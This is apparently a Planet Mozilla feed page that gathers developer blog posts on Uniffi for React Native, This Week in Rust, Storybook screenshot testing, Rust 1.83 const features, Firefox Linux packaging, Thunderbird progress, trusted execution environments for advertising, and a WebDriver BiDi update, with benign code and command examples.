For those familiar with React Native, it’s a great framework for creating cross-platform apps, but it has its challenges. React Native apps rely on a single JavaScript thread, which can slow things down when handling complex tasks. Developers have traditionally worked around this by writing code twice – once for iOS and once for Android – or by using C++, which can be difficult to manage. Uniffi for React Native offers a better solution by enabling developers to offload heavy tasks to Rust, which is now easy to integrate with React Native. As a result, you’ve got faster, smoother apps and a streamlined development process.

How Uniffi for React Native works

Unifii for React Native is a uniFFI bindings generator for using Rust from React Native via Turbo Modules. It lets us work at an abstraction level high enough to stay focused on our applications’s needs rather than getting lost in the gory technical details of bespoke native cross-platform development  It provides tooling to generate:

  • Typescript and JSI C++ to call Rust from Typescript and back again
  • A Turbo-Module that installs the bindings into a running React Native library.

We’re stoked about this work continuing. In 2020, we started with Uniffi as a modern day ‘write once; run anywhere’ toolset for Rust. Uniffi has come a long way since we developed the technology as a bit of a hack to get us a single implementation of Firefox Sync’s core (in Rust) that we could then deploy to both our Android and iOS apps! Since then Mozilla has used uniffi-rs to successfully deploy Rust in mobile and desktop products used by hundreds of millions of users. This Rust code runs important subsystems such as bookmarks and history sync, Firefox Suggest, telemetry and experimentation. Beyond Mozilla, Uniffi is used in Android (in AOSP), high-profile security products and some complex libraries familiar to the community.

Currently the Uniffi for React Native project is an early release. We don’t have a cool landing page or examples in the repo (coming!), but open source contributor Johannes Marbach has already been sponsored by Unomed to use Uniffi for React Native to create a React Native Library for the Matrix SDK .

Need an idea on how you might give it a whirl? I’ve got two uses that we’re very excited about:

1) Use Rust to offload computationally heavy code to a multi-threaded/memory-safe subsystem to escape single-threaded JS performance bottlenecks in React Native. If you know, you know.

2) Leverage the incredible library of Rust crates in your React Native app. One of the Filament devs showed how powerful this is, recently. With a rudimentary knowledge of Rust, they were able to find a fast blurhashing library on crates.io to replace a slow Typescript implementation and get it running the same day. We’re hoping we can really improve the tooling even more to make this kind of optimization as easy as possible.

Uniffi represents a step forward in cross-platform development, combining the power of Rust with the flexibility of React Native to unlock new possibilities for app developers. 

We’re excited to have the community explore what’s possible. Please check out the library on Github and jump into the conversation on Matrix

Disclosure: in addition to this collaboration, Mozilla Ventures is an investor in Filament. 

 

The post Introducing Uniffi for React Native: Rust-Powered Turbo Modules appeared first on Mozilla Hacks - the Web developer blog.

This Week In RustThis Week in Rust 576

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is augurs, a time-series toolkit for Rust with bindings to JS & Python.

Thanks to Ben Sully for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

  • RustWeek 2025 | Closes 2025-01-12 | Utrecht, The Netherlands | Event date: 2025-05-13

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

488 pull requests were merged in the last week

Rust Compiler Performance Triage

Busy week with more PRs impacting performance than is typical. Luckily performance improvements outweighed regressions in real world benchmarks with the largest single performance gain coming from a change to no longer unconditionally do LLVM IR verification in debug builds which was just wasted work.

Triage done by @rylev. Revision range: 7db7489f..490b2cc0

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.5% [0.2%, 1.9%] 58
Regressions ❌
(secondary)
1.1% [0.2%, 5.1%] 85
Improvements ✅
(primary)
-2.3% [-8.2%, -0.2%] 116
Improvements ✅
(secondary)
-2.5% [-8.9%, -0.1%] 55
All ❌✅ (primary) -1.4% [-8.2%, 1.9%] 174

6 Regressions, 6 Improvements, 5 Mixed; 5 of them in rollups 49 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-12-04 - 2025-01-01 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

"self own" sounds like a rust thing

ionchy on Mastodon

Thanks to Jacob Pratt for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Tiger OakesHow to fix Storybook screenshot testing

As an alternative to Chromatic, I’ve been using Storybook’s Test Runner to power screenshot tests for Microsoft Loop. We configure the test runner to run in CI and take a screenshot of every story. However, the initial implementation based on the official Storybook docs was very flaky due to inconsistent screenshots of the same story. Here are some tips to reduce flakiness in your Storybook screenshot tests.

The Storybook Test Runner configuration

<figcaption class="header">.storybook/test-runner.js</figcaption>
import * as path from 'node:path';
import { getStoryContext, waitForPageReady } from '@storybook/test-runner';
/**
* @type {import('@storybook/test-runner').TestRunnerConfig}
*/
const config = {
async preVisit(page) {
await page.emulateMedia({ reducedMotion: 'reduce' });
},
async postVisit(page, context) {
const { tags, title, name } = await getStoryContext(page, context);
if (!tags.includes('no-screenshot')) {
// Wait for page idle
await waitForPageReady(page);
await page.evaluate(
() => new Promise((resolve) => window.requestIdleCallback(resolve))
);
// Wait for images to load
await page.waitForFunction(() =>
Array.from(document.images).every((i) => i.complete)
);
// INFO: '/' or "\\" in screenshot name creates a folder in screenshot location.
// Replacing with '-'
const ssNamePrefix = `${title}.${name}`
.replaceAll(path.posix.sep, '-')
.replaceAll(path.win32.sep, '-');
await page.screenshot({
path: path.join(
process.cwd(),
'dist/screenshots',
`${ssNamePrefix}.png`
),
animations: 'disabled',
caret: 'hide',
mask: [
page.locator('css=img[src^="https://res.cdn.office.net/files"]'),
],
});
}
},
};
export default config;

This configuration essentially tells Storybook to run page.screenshot after each story loads, using the postVisit hook. As the Test Runner is based on Playwright, we can use Playwright’s screenshot function to to take pictures and save them to disk.

Disable animations

One source of inconsistency in screenshot tests is animation, as the screenshot will be taken at slightly different times. Luckily, Playwright has a built-in option to disable animations.

<figcaption class="header"></figcaption>
await page.screenshot({
animations: 'disabled',
caret: 'hide',
});

Additionally, we can use the prefers-reduced-motion media query to use CSS designed for no motion. (You are writing CSS for reduced motion, right?) This can be configured when the page is loaded in the preVisit hook.

<figcaption class="header"></figcaption>
async function preVisit(page) {
await page.emulateMedia({ reducedMotion: 'reduce' });
}

Wait for images to load

Since images are a separate network request, they might not be loaded when the screenshot is taken. We can get a list of all the image elements on the page and wait for them to complete.

<figcaption class="header"></figcaption>
// waitForFunction waits for the function to return a truthy value
await page.waitForFunction(() =>
// Get list of images on the page
Array.from(document.images)
// return true if .complete is true for all images
.every((i) => i.complete)
);

However, we still ended up with some issues for images that load over the internet instead of from the disk. To fix this, we can mask out specific elements from the screenshot using the mask option. I wrote a CSS selector for images loaded from the Office CDN.

<figcaption class="header"></figcaption>
await page.screenshot({
mask: [page.locator('css=img[src^="https://res.cdn.office.net/files"]')],
});

Try to figure out if the page is idle

Storybook Test Runner includes a helper waitForPageReady function that waits for the page to be loaded. We also wait for the browser to be in an idle state using requestIdleCallback.

<figcaption class="header"></figcaption>
import { waitForPageReady } from '@storybook/test-runner';
await waitForPageReady(page);
await page.evaluate(
() => new Promise((resolve) => window.requestIdleCallback(resolve))
);

Both of these feel more like vibes than guarantees, but they can help reduce flakiness.

Custom assertions in stories

The above configuration gives a good baseline, but you’ll likely end up with one-off issues in specific stories (especially if React Suspense or lazy loading is involved). In these cases, you can add custom assertions to the story itself! Storybook Test Runner waits until the play function in the story is resolved, so you can add assertions there.

<figcaption class="header">Component.stories.js</figcaption>
import { expect, within } from '@storybook/test';
export const SomeStory = {
async play({ canvasElement }) {
const canvas = within(canvasElement);
await expect(
await canvas.findByText('Lazy loaded string')
).toBeInTheDocument();
},
};

Future Vitest support

Storybook is coming out with a brand-new Test addon based on Vitest. This isn’t supported by Webpack loaders so we can’t use it for Microsoft Loop yet, but it’s something to keep an eye on. Vitest will run in browser mode on top of Playwright, so the page object will still be available.

<figcaption class="header"></figcaption>
import { page } from '@vitest/browser/context';

The Mozilla BlogUsing trusted execution environments for advertising use cases

This article is the next in a series of posts we’ll be doing to provide more information on how Anonym’s technology works.  We started with a high level overview, which you can read here.

Mozilla acquired Anonym over the summer of 2024, as a key pillar to raise the standards of privacy in the advertising industry. These privacy concerns are well documented, as described in the US Federal Trade Commission’s recent report. Separate from Mozilla surfaces like Firefox, which work to protect users from invasive data collection, Anonym is ad tech infrastructure that focuses on improving privacy measures for data commonly shared between advertisers and ad networks. A key part of this process is where that data is sent and stored. Instead of advertisers and ad networks sharing personal user data with each other, they encrypt it and send it to Anonym’s Trusted Execution Environment.  The goal of this approach is to unlock insights and value from data without enabling the development of cross-site behavioral profiles based on user-level data.

A trusted execution environment (TEE) is a technology for securely processing sensitive information in a way that protects code and data from unauthorized access and modification. A TEE can be thought of as a locked down environment for processing confidential information. The term enclave refers to the secure memory portion of the trusted execution environment.

Why TEEs?

TEEs improve on standard compute infrastructure due to:

  • Confidentiality – Data within the TEE is encrypted and inaccessible outside the TEE, even if the underlying system is compromised. This ensures that sensitive information remains protected.
  • Attestation – TEEs can provide cryptographic proof of their identity and the code they intend to execute. This allows other parts of the system to verify that the TEE is trustworthy before interacting with it and ensures only authorized code will process sensitive information.

Because humans can’t access TEEs to manipulate the code, Anonym’s system requires that all the operations that must be performed on the data be programmed in advance. We do not support arbitrary queries or real-time data manipulation. While that may sound like a drawback, it offers two material benefits. First, it ensures that there are no surprises. Our partners know with certainty how their data will be processed. Anonym and its partners cannot inadvertently access or share user data. Second, this hardened approach also lends itself to highly repeatable use cases. In our case, for example, this means ad platforms can run a measurement methodology repeatedly with many advertisers without needing to approve the code each time knowing that by design, the method and the underlying data are safe.

TEEs in Practice

Today, Anonym uses hardware-based Trusted Execution Environments (TEEs) based on Intel SGX offered by Microsoft Azure. We believe Intel SGX is the most researched and widely deployed approach to TEEs available today.

When working with our ad platform partners, Anonym develops the algorithm for the specific advertising application. For example, if an advertiser is seeking to understand whether and which ads are driving the highest business value, we will customize our attribution algorithm to align with the ad platform’s standard approach to attribution. This includes creating differentially private output to protect data subjects from reidentification. 

Prior to running any algorithm on partner data, we provide our partners with documentation and source code access through our Transparency Portal, a process we refer to as binary review. Once our partners have reviewed a binary, they can approve it using the Transparency Portal. If, at any time, our partners want to disable Anonym’s ability to process data, they can revoke approval.

Each ‘job’ processed by Anonym starts with an ephemeral TEE being spun up. Encrypted data from our partners is pulled into the TEE’s encrypted memory. Before the data can be decrypted, the TEE must verify its identity and integrity. This process is referred to as attestation. Attestation starts with the TEE creating cryptographic evidence of its identity and the code it intends to run (similar to a hash). The system will compare that evidence to what has been approved for each partner contributing data. Only if this attestation process is successful will the TEE be able to decrypt the data. If the cryptographic signature of the binary does not match the approved binary, the TEE will not get access to the keys to decrypt and will not be able to process the data. 

Attestation ensures our partners have control of their data, and can revoke access at any point in time. It also ensures Anonym enclaves never have access to sensitive data without customer visibility.  We do this by providing customers with a log that records an entry any time a customer’s data is processed.

Once the job is complete and the anonymized data is written to storage, the TEE is spun down and the data within it is destroyed. The aggregated and differentially private output is then shared with our partners. 

We hope this overview has been helpful. Our next blog post will walk through Anonym’s approach to transparency and control through our Transparency Portal.

The post Using trusted execution environments for advertising use cases appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderbird Monthly Development Digest – November 2024

Hello Thunderbird Community! Another adventurous month is behind us, and the team has emerged victorious from a number of battles with code, quirks, bugs and performance issues. Here’s a quick summary of what’s been happening across the front and back end teams as some of the team heads into US Thanksgiving:

Exchange Web Services support in Rust

November saw an increase in the number of team members contributing to the project and to the number of features shipped! Users on our Daily release channel can help to test newly-released features such as copy and move messages from EWS to another protocol, marking a message as read/unread, and local storage functionality. Keep track of feature delivery here.

If you aren’t already using Daily or Beta, please consider downloading to get early access to new features and fixes, and to help us uncover issues early.

Account Hub

Development of a refreshed account hub has reached the end of an important initial stage, so is entering QA review next week while we spin up tasks for phase 2 – taking place in the last few weeks of the year. Meta bug & progress tracking.

Global Database & Conversation View

Work to implement a long term database replacement is moving ahead despite some team members being held up in firefighting mode on regressions from patches which landed almost a year ago. Preliminary patches on this large-scale project are regularly pumped into the development ecosystem for discussion and review, with the team aiming to be back to full capacity before the December break.

In-App Notifications

With phase 1 of this project now complete, we’ve uplifted the feature to 134.0 Beta and notification tests will be activated this week. Phase 2 of the project is well underway, with some features accelerated and uplifted to form part of our phase 1 testing plan.  Meta Bug & progress tracking.

Folder & Message Corruption

Some of the code we manage is now 20 years old and efforts are constantly under way to modernize, standardize and make things easier to maintain in the future. While this process is very rewarding, it often comes with unforeseen consequences which only come to light when changes are exposed to the vast number of users on our “ESR” channel who have edge cases and ways of using Thunderbird that are hard to recreate in our limited test environments.

The past few months have been difficult for our development team as they have responded to a wide range of issues related to message corruption. After a focused team effort, and help from a handful of dedicated users and saintly contributors, we feel that we have not only corrected any issues that were introduced during our recent refactoring, but also uncovered and solved problems that have been plaguing our users for years. And long may that continue! We’re here to improve things!

New Features Landing Soon

Several requested features have reached our Daily users and include…

If you want to see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

See you next month.

Toby Pilling

Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – November 2024 appeared first on The Thunderbird Blog.

Firefox NightlyAnnouncing Faster, Lighter Firefox Downloads for Linux with .tar.xz Packaging!

We’re excited to announce an improvement for our Linux users that enhances both performance and compatibility with various Linux distributions.

Switching to .tar.xz Packaging for Linux Builds

In our ongoing effort to optimize Firefox for all users, we are transitioning the packaging format of Firefox for Linux from .tar.bz2 to .tar.xz (utilizing the LZMA compression algorithm). This change results in smaller download sizes and faster decompression times, making your experience smoother and more efficient.

What This Means for You

  • Smaller Downloads: The Firefox .tar.xz packages are, on average, 25% smaller than their .tar.bz2 counterparts. This means quicker downloads, saving you time and bandwidth.
  • Faster Installation: With improved decompression speeds, installing Firefox on Linux will be faster than ever. The .tar.xz format decompresses more than twice as fast as .tar.bz2, allowing you to get up and running in no time.
  • Enhanced Compatibility: Modern Linux distributions support the .tar.xz format. This switch aligns Firefox with the standards of the Linux community, ensuring better integration and compatibility.
  • No Action Required for Current Users: If you already have Firefox installed on your computer, there’s nothing you need to do. Firefox will continue to operate and update as usual.

Accessing the New Packages

(Re)installing Firefox? Just curious about testing out the compression?

Starting today, November 27th, 2024 you can find the new .tar.xz archives on our downloads page. Simply select the Firefox Nightly for Linux that you desire, and you’ll receive the new packaging format.

Maintaining Firefox on your favorite Linux distribution?

For package maintainers or scripts that reference our download links, please note that this packaging change is currently implemented in Firefox Nightly and will eventually roll out to the Beta and Release channels in the weeks to come.

To maintain uninterrupted updates now and in the future, we recommend updating your scripts to handle both .tar.bz2 and .tar.xz extensions, or switching to .tar.xz format when it becomes available in your preferred channel.

Why does Firefox use .tar.xz instead of Zstandard (.zst) for Linux releases?

While Zstandard is slightly faster to decompress, we chose .tar.xz because it offers better compression, reducing download sizes and saving bandwidth. Additionally, .tar.xz is widely supported across Linux systems, ensuring compatibility without extra dependencies.

For more details on how the decision was made, please refer to bug 1710599.

We Value Your Feedback

Your input is crucial to us. We encourage you to download the new .tar.xz packaged builds, try them out, and let us know about your experience.

  • Report Issues: If you encounter any bugs or problems, please report them through Bugzilla.
  • Stay Connected: Join the discussion and share your thoughts with the Firefox Nightly community. Your feedback helps us improve and tailor Firefox to better meet your needs.

Thank You for Your Support

We appreciate your continued participation in the Firefox Nightly community. Together, we’re making Firefox better every day. Stay tuned for more updates, and happy browsing!

Tiger Oakes2024 JS Rap Up

To open JSNation US 2024, Daphne asked me to help write a rap to recap the year in JavaScript news, parodying mrgrandeofficial. Here’s what I came up with (with info from Frontend Focus, TC39 meetings, and lots of web searches)!

Thanks to rappers CJ Reynolds, Daphne Oakes, Henri Helvetica, and Beau Carnes - aka Hip Hop Array!

alt

The Script

11 months into 2024…
let’s recap Javascript once more

January

iOS gets new browser engines
Apple creates PWA tension

February

React Labs drops a big update
Transferable buffers come out the gate

March

JSR comes alive
World Wide Web turns 35

April

Node 22 gives us module require()
ESLint 9 sets configs on fire

May

React 19 enters RC
SolidStart 1 adds simplicity

June

This year’s spec is ratified
JSNation on the EU side

July

Ladybird browser enters the race
Node tries type stripping whitespace

August

rspack 1 hits 1.0
telling webpack you’re too slow

September

Tell Oracle: drop JS trademark
So we can leave ECMAScript in the dark

October

Here comes NextJS 15
Deno 2, Svelte 5 - so fresh so clean

November

Bluesky rising, Twitter’s outcast
CSS gets a logo at last

JSNation will be a blast!

The Rust Programming Language BlogAnnouncing Rust 1.83.0

The Rust team is happy to announce a new version of Rust, 1.83.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.83.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.83.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.83.0 stable

New const capabilities

This release includes several large extensions to what code running in const contexts can do. This refers to all code that the compiler has to evaluate at compile-time: the initial value of const and static items, array lengths, enum discriminant values, const generic arguments, and functions callable from such contexts (const fn).

References to statics. So far, const contexts except for the initializer expression of a static item were forbidden from referencing static items. This limitation has now been lifted:

static S: i32 = 25;
const C: &i32 = &S;

Note, however, that reading the value of a mutable or interior mutable static is still not permitted in const contexts. Furthermore, the final value of a constant may not reference any mutable or interior mutable statics:

static mut S: i32 = 0;

const C1: i32 = unsafe { S };
// error: constant accesses mutable global memory

const C2: &i32 = unsafe { &S };
// error: encountered reference to mutable memory in `const`

These limitations ensure that constants are still "constant": the value they evaluate to, and their meaning as a pattern (which can involve dereferencing references), will be the same throughout the entire program execution.

That said, a constant is permitted to evaluate to a raw pointer that points to a mutable or interior mutable static:

static mut S: i32 = 64;
const C: *mut i32 = &raw mut S;

Mutable references and pointers. It is now possible to use mutable references in const contexts:

const fn inc(x: &mut i32) {
    *x += 1;
}

const C: i32 = {
    let mut c = 41;
    inc(&mut c);
    c
};

Mutable raw pointers and interior mutability are also supported:

use std::cell::UnsafeCell;

const C: i32 = {
    let c = UnsafeCell::new(41);
    unsafe { *c.get() += 1 };
    c.into_inner()
};

However, mutable references and pointers can only be used inside the computation of a constant, they cannot become a part of the final value of the constant:

const C: &mut i32 = &mut 4;
// error[E0764]: mutable references are not allowed in the final value of constants

This release also ships with a whole bag of new functions that are now stable in const contexts (see the end of the "Stabilized APIs" section).

These new capabilities and stabilized APIs unblock an entire new category of code to be executed inside const contexts, and we are excited to see how the Rust ecosystem will make use of this!

Stabilized APIs

These APIs are now stable in const contexts:

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.83.0

Many people came together to create Rust 1.83.0. We couldn't have done it without all of you. Thanks!

The Mozilla BlogCelebrating 20 years of Firefox with 20 red panda cams

A red panda video displayed in Firefox's Picture-in-Picture mode, with the pop-out video icon visible in the corner.<figcaption class="wp-element-caption">Spot the picture-in-picture icon — your key to multitasking with a red panda buddy on your screen.</figcaption>

Firefox turns 20 this year, so here’s a bit of history: When Mozilla set out to brainstorm a new browser name, the team played with combinations of animals and natural elements. “Fire” and “fox” got paired on a whiteboard, and a quick web search turned up red pandas — known locally as “firefoxes.” They were unique, rare and perfect for us.

Today, we’re celebrating that connection by partnering with the Red Panda Network to help raise awareness for the protection of these remarkable creatures and their Himalayan habitat. Red pandas play a crucial role in their ecosystem, helping sustain one of the world’s most biodiverse regions, filled with endangered species.

In true “firefox” spirit, we’ve handpicked 20 red panda cams for you to enjoy. Watch as they climb through treetops, snack on bamboo, and stretch, scratch and relax in their habitats.

By the way, you can keep these “firefoxes” on your screen all day with Firefox’s picture-in-picture feature, which lets you pop a video out of its webpage and pin it anywhere while you juggle other pages, tabs or apps. (Try it with Zoo Knoxville’s red panda cam below by clicking A square icon with a smaller square and an arrow pointing outward, commonly representing "Picture-in-Picture mode.")

Let’s be honest, it’s been a year. Who can’t use more red pandas in their life? It’s also our way of honoring 20 years of Firefox — and the rare, resilient creatures we share a name with. After all, they’ve always been part of our story. 

Get Firefox

Get the browser that protects what’s important

The post Celebrating 20 years of Firefox with 20 red panda cams appeared first on The Mozilla Blog.

Spidermonkey Development BlogSpiderMonkey Newsletter (Firefox 132-134)

Hello! Welcome to another episode of the SpiderMonkey Newsletter. I’m your host, Matthew Gaudet.

In the spirit of the upcoming season, let’s talk turkey. I mean, monkeys. I mean SpiderMonkey.

Today we’ll cover a little more ground than the normal newsletter.

If you haven’t already read Jan’s wonderful blog about how he managed to improve Wasm compilation speed by 75x on large modules, please take a peek. It’s a great story of how O(n^2) is the worst complexity – fast enough to seem OK in small cases, and slow enough to blow up horrendously when things get big.

🚀 Performance

👷🏽‍♀️ New features & In Progress Standards Work

🚉 SpiderMonkey Platform Improvements

This Week In RustThis Week in Rust 575

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is postcard, a battle-tested, well-documented #[no_std] compatible serializer/deserializer geared towards use in embedded devices.

Thanks to Reto Trappitsch for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

RFCs
Rust
Rustup

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

405 pull requests were merged in the last week

Rust Compiler Performance Triage

This week saw more regressions than improvements, mostly due to three PRs that performed internal refactorings that are necessary for further development and modification of the compiler.

Triage done by @kobzol. Revision range: 7d40450b..7db7489f

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.6% [0.1%, 3.6%] 57
Regressions ❌
(secondary)
0.6% [0.0%, 2.7%] 100
Improvements ✅
(primary)
-0.5% [-1.5%, -0.2%] 11
Improvements ✅
(secondary)
-0.4% [-0.5%, -0.3%] 7
All ❌✅ (primary) 0.4% [-1.5%, 3.6%] 68

4 Regressions, 2 Improvements, 3 Mixed; 3 of them in rollups 40 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-11-27 - 2024-12-25 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Will never stop being positively surprised by clippy

text error: hypothenuse can be computed more accurately: --> src/main.rs:835:5 | 835 | (width * width + height * height).sqrt() / diag | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ help: consider using `width.hypot(height)` | help: for further information, visit https://rust-lang.github.io/rust-clippy/master/index.html#imprecise_flops

llogiq is quite self-appreciative regarding his suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Rust Programming Language BlogRust 2024 call for testing

Rust 2024 call for testing

We've been hard at work on Rust 2024. We're thrilled about how it has turned out. It's going to be the largest edition since Rust 2015. It has a great many improvements that make the language more consistent and ergonomic, that further our relentless commitment to safety, and that will open the door to long-awaited features such as gen blocks, let chains, and the never (!) type. For more on the changes, see the nightly Edition Guide.

As planned, we recently merged the feature-complete Rust 2024 edition to the release train for Rust 1.85. It has now entered nightly beta1.

You can help right now to make this edition a success by testing Rust 2024 on your own projects using nightly Rust. Migrating your projects to the new edition is straightforward and mostly automated. Here's how:

  1. Install the most recent nightly with rustup update nightly.
  2. In your project, run cargo +nightly fix --edition.
  3. Edit Cargo.toml and change the edition field to say edition = "2024" and, if you have a rust-version specified, set rust-version = "1.85".
  4. Run cargo +nightly check to verify your project now works in the new edition.
  5. Run some tests, and try out the new features!

(More details on how to migrate can be found here and within each of the chapters describing the changes in Rust 2024.)

If you encounter any problems or see areas where we could make the experience better, tell us about it by filing an issue.

Coming next

Rust 2024 will enter the beta channel on 2025-01-09, and will be released to stable Rust with Rust 1.85 on 2025-02-20.

  1. That is, it's still in nightly (not in the beta channel), but the edition items are frozen in a way similar to it being in the beta channel, and as with any beta, we'd like wide testing.

Firefox Developer ExperienceFirefox WebDriver Newsletter 133

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 133 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

We are always grateful to receive external contributions, here are the ones which made it in Firefox 133:

  • Liam (ldebeasi) added an internal helper to make it easier to call commands from the parent process to content processes
  • Dan (temidayoazeez032) updated the error thrown by the browsingContext.print command for invalid dimensions

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi.

WebDriver BiDi

Support for url argument of network.continueRequest

We just added support for the "url" argument of the network.continueRequest. This parameter, which should be a string representing a URL, allows a request blocked in the beforeRequestSent phase to be transparently redirected to another URL. The content page will not be aware of the redirect, and will consider the response as if it came from the originally targeted URL.

In terms of BiDi network events, note that this transparent redirect will also not lead to additional network.beforeRequestSent events. The redirect count for this request/response will not be increased by this command either. It can be useful if clients want to redirect a specific call to a test API, without having to update the implementation of the website/webapplication.

-> {
  "method": "network.continueRequest",
  "params": {
    "request": "12",
    "url": "https://bugzilla.allizom.org/show_bug.cgi?id=1234567"
  },
  "id": 2
}

<- { "type": "success", "id": 2, "result": {} }

As with other network interception features, using this command and this parameter relies on the fact that the client is monitoring network events and has setup appropriate intercepts in order to catch specific requests. For more details, you can check out the Firefox WebDriver 124 newsletter where we introduced network interception.

Bug fixes

Marionette

Bug fixes

Don Martiopt out of Google Page Annotations

Ever wish Google would have one button for opt me out of all Google growth hacking schemes that you could click once and be done with it? Me too. But that’s not how it works.

